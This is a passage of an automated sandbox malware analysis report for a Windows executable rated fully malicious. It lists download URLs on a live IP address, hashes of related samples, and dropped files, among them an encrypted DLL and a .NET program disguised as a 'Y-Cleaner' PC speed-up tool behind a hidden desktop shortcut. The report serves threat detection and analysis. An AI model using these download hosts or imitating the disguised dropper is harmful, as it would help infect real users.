http://185.156.73.23/files/download%	WwVs3PavPg.exe, 00000000.00000003.2893028114.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.156.73.23/files/downloadv	WwVs3PavPg.exe, 00000000.00000002.3075218160.0000000005570000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.156.73.23	unknown	Russian Federation		48817	RELDAS-NETRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578996
Start date and time:	2024-12-20 17:31:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WwVs3PavPg.exe renamed because original name is a hash value
Original Sample Name:	4e341a5e65522dc7ad83bab52f3e60f8.exe
Detection:	MAL
Classification:	mal100.evad.winEXE@2/15@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 4.175.87.197, 20.190.181.6
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: WwVs3PavPg.exe

Simulations

Behavior and APIs

Time	Type	Description
11:32:32	API Interceptor	918190x Sleep call for process: WwVs3PavPg.exe modified
11:33:26	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.156.73.23	3K6rBUOQ2z.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	zSmMqGGeVy.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	tXEKP1ThBP.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	hvm4oOzDaX.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	4kahanaK78.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	7JKssbjRDa.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	dI3n4LSHB7.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	zmTSHkabY6.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	8V0INSl0E2.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download
	BEd2lJRXFM.exe	Get hash	malicious	Unknown	Browse	185.156.73.23/soft/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0035.t-0009.t-msedge.net	Tsy9P2T9yF.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	http://www.eventcreate.com/e/you-have-received-a-new-doc	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	gTU8ed4669.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.63
	zSmMqGGeVy.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	2M43DSi2cx.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	VajVW1leCd.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	7JKssbjRDa.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	m21jm5y5Z5.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	16ebsersuX.exe	Get hash	malicious	Cryptbot	Browse	13.107.246.63
	Qmg24kMXxU.exe	Get hash	malicious	LummaC, Stealc	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RELDAS-NETRU	3K6rBUOQ2z.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	zSmMqGGeVy.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	tXEKP1ThBP.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	hvm4oOzDaX.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	4kahanaK78.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	7JKssbjRDa.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	dI3n4LSHB7.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	zmTSHkabY6.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	8V0INSl0E2.exe	Get hash	malicious	Unknown	Browse	185.156.73.23
	BEd2lJRXFM.exe	Get hash	malicious	Unknown	Browse	185.156.73.23

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WwVs3PavPg.exe_f26d4b04eca194c79bee6679870b65d217944b4_9a33ec32_c51566d6-6ce9-4db5-9910-5a9b8395e495\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9854104590230329
Encrypted:	false
SSDEEP:	96:+PpBuResLhN57YjSYQXIDcQBc6fcEncw3mi1lJ+HbHg/8BRTf3Oy1oVazW0H9nFn:cvQeo0/bNC2gjud3szuiF9Z24IO8+
MD5:	9BA4368599A645BCE7B96A0A56D19F59
SHA1:	D147BFEA2B427FB1C7BDB4D4DAD97DE12CCD4785
SHA-256:	B96340943EF5404DBA2A9AC16F52BD242F8B6E6510FA7EEA0B98408A30CB752C
SHA-512:	EA84624118207A918172DE672CBF47192B3BFB252AEE87B517F82D550880C480B08B70A1125343DA164A0930F3BE1CA1CDB96B7F5024507D918900121E32CFF4
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.6.0.0.0.7.5.0.9.7.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.6.0.0.1.3.2.9.1.0.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.1.5.6.6.d.6.-.6.c.e.9.-.4.d.b.5.-.9.9.1.0.-.5.a.9.b.8.3.9.5.e.4.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.a.b.2.2.3.f.-.5.9.3.1.-.4.a.3.e.-.a.f.f.0.-.3.3.5.a.8.8.c.4.c.9.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.w.V.s.3.P.a.v.P.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.6.c.-.0.0.0.1.-.0.0.1.5.-.9.1.a.7.-.1.3.b.2.f.c.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.b.4.3.b.6.7.f.e.5.8.3.0.a.3.f.8.2.a.8.2.7.e.9.3.2.b.f.b.7.8.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.3.a.1.d.7.6.7.1.0.0.6.8.d.3.8.c.d.3.5.e.d.9.0.8.c.0.6.7.7.2.6.3.f.5.d.9.7.e.9.!.W.w.V.s.3.P.a.v.P.g...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E55.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Dec 20 16:33:21 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46604
Entropy (8bit):	2.5494925503802586
Encrypted:	false
SSDEEP:	384:LU28wv/nP+io1yAC1XWD9+Vuy2tf//IMVAYX:LUvwvPP+5yAC1mybeCO
MD5:	6E3E9221E10A5E56185AA38BE72647FE
SHA1:	30A1455DF433072477DDE7C15CC181E20796362E
SHA-256:	999F03EBD4E12802259C9C9F2D92C98D3CE6279E79040B9A9204C83BCAE180DA
SHA-512:	4EA5802CB2A4F804E54BD7365358037FF4359C662FAFBC693A9528A0F882CD4210E35E9CFFF9A4BA2B36162554B9FD114CB9673D122C447740D73C18F2AFDDE1
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......Q.eg............4...........8...<.......D....,..........T.......8...........T...........PB...s..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.......l.....eg....*........................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F8E.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.6951365047542124
Encrypted:	false
SSDEEP:	192:R6l7wVeJ5o6EM6Y2D/SU9lzngmfSX2BpDM89bTZsf6Cxm:R6lXJG6n6YySU95ngmfSmNTyf6t
MD5:	2499B48DC079533C6620779ADC4251BB
SHA1:	6B3F7C01EE213C1DA3D6790985CD6E0CBD639DBC
SHA-256:	7B698C33EE66088A00256D48B2522D72ACF50F145772E5F66499F4856427B6A9
SHA-512:	7CF0FCD154CA6E9A4DC71286B6932BF09E9BB656985E2569F2E1C4AF35D4703530D7F1A95B0DDAFFD03B0B3EA3C813A092739824EDF02B505DAF94BD2E34C453
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7FCE.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4680
Entropy (8bit):	4.4485832099485645
Encrypted:	false
SSDEEP:	48:cvIwWl8zsLJg77aI9QBVWpW8VYSYm8M4JitVFh+q8vhjJzC5d:uIjflI7mS7V+JiTKZJzC5d
MD5:	6D0F8138C359828F757CD83933D5234F
SHA1:	CC6F48E9DC96BCDACB90D068ADFA2FD517F677D3
SHA-256:	593DD566E8B0506CDBA818B03E1545CD0DC96CC07C945F3B491FCF8D435F1C47
SHA-512:	C8A861B82AFC5C2E8A4A5FA7585F54595ADFF7A49A7E5292A9DB2D2DFC6732D41091131889CD2F8DCF13EAFB4850A89F0E45157BAED5727BD8CFE1F4FCD342EB
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639816" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\fuckingdllENCR[1].dll

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	data
Category:	dropped
Size (bytes):	97296
Entropy (8bit):	7.9982317718947025
Encrypted:	true
SSDEEP:	1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
MD5:	E6743949BBF24B39B25399CD7C5D3A2E
SHA1:	DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
SHA-256:	A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
SHA-512:	3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~\|..j...b..K!..N.7R.}T.2bsq..1...L^..!.\|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO\|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\add[1].htm

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10000
Entropy (8bit):	4.8309684759931635
Encrypted:	false
SSDEEP:	192:cjVSgJauTkEbY8rf5B9k/AbEtFd3ZcXFwfo4khTlFdGcENpwXZs:cjPaAk2jRPkvF9ZcXFJv7y
MD5:	6178EB0BD52A1FA387456B1F6D434185
SHA1:	3A25FCEBAE309E3953FCF4E437FF5A7F0842FC97
SHA-256:	69F115311C0280B27401D4C3199A17A5EDC82E746D9FA9A27A22B98BB7F85E59
SHA-512:	54D8BD93E6CE0BABBEE219B6C1EA0A3700F4892D5AEB050F615B89FFD2145D5B3B9896528BDD521DA395D337F89DB6B15033F639D4AB4EBD4F9ADF25143E8A57
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\download[1].htm

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\soft[1]

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	14000
Entropy (8bit):	4.595813025702489
Encrypted:	false
SSDEEP:	384:6VU5UCvLaX5V56vVw6bL13wqxWrJQPBlWHlt+AuAm/XB9bx0Q9X8Hu73O:x5UimQxKG/HN0Q+
MD5:	A0CB5DFE19EEA817EEC1C5BF06CBEB88
SHA1:	0EEB3B07AB2F2C9CC47F47BD13AF715A6342DEA5
SHA-256:	1C837B7491F1DCC71A46D33AD4A5E6F7AA5AC853A7A087D27B42C085BBDA68CF
SHA-512:	6D79FE9F9E7F9F0EFCA986A4771634792FD516CF4B58376765375A48AB81F306E4AD9D1A35075106A39D07C4E71B4F518165C3BC9A3268FEB02AF2F2B1B86F3D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\key[1].htm

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.880179922675737
Encrypted:	false
SSDEEP:	3:gFsR0GOWW:gyRhI
MD5:	408E94319D97609B8E768415873D5A14
SHA1:	E1F56DE347505607893A0A1442B6F3659BEF79C4
SHA-256:	E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
SHA-512:	994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
Malicious:	false
Preview:	9tKiK3bsYm4fMuK47Pk3s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\download[1].htm

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Temp\KdYG3fvBdfevG5\Bunifu_UI_v1.5.3.dll

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10000
Entropy (8bit):	4.8309684759931635
Encrypted:	false
SSDEEP:	192:cjVSgJauTkEbY8rf5B9k/AbEtFd3ZcXFwfo4khTlFdGcENpwXZs:cjPaAk2jRPkvF9ZcXFJv7y
MD5:	6178EB0BD52A1FA387456B1F6D434185
SHA1:	3A25FCEBAE309E3953FCF4E437FF5A7F0842FC97
SHA-256:	69F115311C0280B27401D4C3199A17A5EDC82E746D9FA9A27A22B98BB7F85E59
SHA-512:	54D8BD93E6CE0BABBEE219B6C1EA0A3700F4892D5AEB050F615B89FFD2145D5B3B9896528BDD521DA395D337F89DB6B15033F639D4AB4EBD4F9ADF25143E8A57
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....:..s.....(...........2r...p(;...&Vr...p.....r...p.......(....>.........}.......(C.....o...(D...(E...}.....(F...(E...(G...&>.........}.......(C.....o...(D...}.....(F...(E...(H...&".......>.........}....R..} .....{ ...oo.....{ ..."..}!.....{!......}.....{#....{....op....{....,...{ ...oo.....{!...oo.....{....B.....su...(v.....{#....{#...

C:\Users\user\AppData\Local\Temp\KdYG3fvBdfevG5\Y-Cleaner.exe

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	14000
Entropy (8bit):	4.595813025702489
Encrypted:	false
SSDEEP:	384:6VU5UCvLaX5V56vVw6bL13wqxWrJQPBlWHlt+AuAm/XB9bx0Q9X8Hu73O:x5UimQxKG/HN0Q+
MD5:	A0CB5DFE19EEA817EEC1C5BF06CBEB88
SHA1:	0EEB3B07AB2F2C9CC47F47BD13AF715A6342DEA5
SHA-256:	1C837B7491F1DCC71A46D33AD4A5E6F7AA5AC853A7A087D27B42C085BBDA68CF
SHA-512:	6D79FE9F9E7F9F0EFCA986A4771634792FD516CF4B58376765375A48AB81F306E4AD9D1A35075106A39D07C4E71B4F518165C3BC9A3268FEB02AF2F2B1B86F3D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\Desktop\Cleaner.lnk

Process:	C:\Users\user\Desktop\WwVs3PavPg.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 15:33:20 2024, mtime=Fri Dec 20 15:33:20 2024, atime=Fri Dec 20 15:33:20 2024, length=14000, window=hide
Category:	dropped
Size (bytes):	2144
Entropy (8bit):	3.798986421425492
Encrypted:	false
SSDEEP:	24:8iII20Co2DNlXOXoRrgKwN+ibABaCjiVvNY78O4ZCji9qVsbqygm:8VXDNle4RxiMcfvNY78ZrqRyg
MD5:	6D9FAB8437FFD2ED495E807312AFEC7D
SHA1:	8B2F7A6FF6C5960AFE5A531E41BA278F623BA62A
SHA-256:	C644F3EDA59DCABFB7728F848512F0CF9B650C8FC709CD5A6F023F10E632783C
SHA-512:	57971C1CA731B7C6B0E62FD9708A636DF528510764953C124AD72D37D0529B2B628AC3D7C5020945C237BF54192C40D38F99981721AC9BDA14D9EE2765A0CD79
Malicious:	false
Preview:	L..................F.@.. ....u0..R...u0..R...u0..R...6......................*.:..DG..Yr?.D..U..k0.&...&.......$..S...P...R....2..R......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.P.1......Y....Local.<......EW<2.Y......[.....................f.-.L.o.c.a.l.....N.1......Y(...Temp..:......EW<2.Y(.....^......................\^.T.e.m.p.....f.1......Y(...KDYG3F~1..N......Y(..Y(.....B......................\^.K.d.Y.G.3.f.v.B.d.f.e.v.G.5.....h.2..6...Y+. .Y-CLEA~1.EXE..L......Y+..Y+.....p.....................k?$.Y.-.C.l.e.a.n.e.r...e.x.e.......p...............-.......o............i F.....C:\Users\user\AppData\Local\Temp\KdYG3fvBdfevG5\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.2.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.K.d.Y.G.3.f.v.B.d.f.e.v.G.5.\.Y.-.C.l.e.a.n.e.r...e.x.e.A.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.K.d.Y.G.3.f.v.B.d.f.e.v.G.5.\.Y.-.C.l.

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468604674460367
Encrypted:	false
SSDEEP:	6144:LzZfpi6ceLPx9skLmb0f+ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNyjDH5S:nZHt+ZWOKnMM6bFpQj4
MD5:	93289C2B9C3A91C774E46AA8566B1F98
SHA1:	291CD16FB3A819B7E400B28D7AB11C4CFEA8C0FC
SHA-256:	267C461317CB8566E05BE003E96FC8A55DC9C5AE7016090BCAB8DE9BA68B080D
SHA-512:	8451A3AE9A1BF8010784ED6E590F1158955817A7F4CDFFDCB8CAFA4D4CD56D4F799B7613D80D8F942BC61A40C3486137F560B4FB63E0066739699E5E1B380266
Malicious:	false
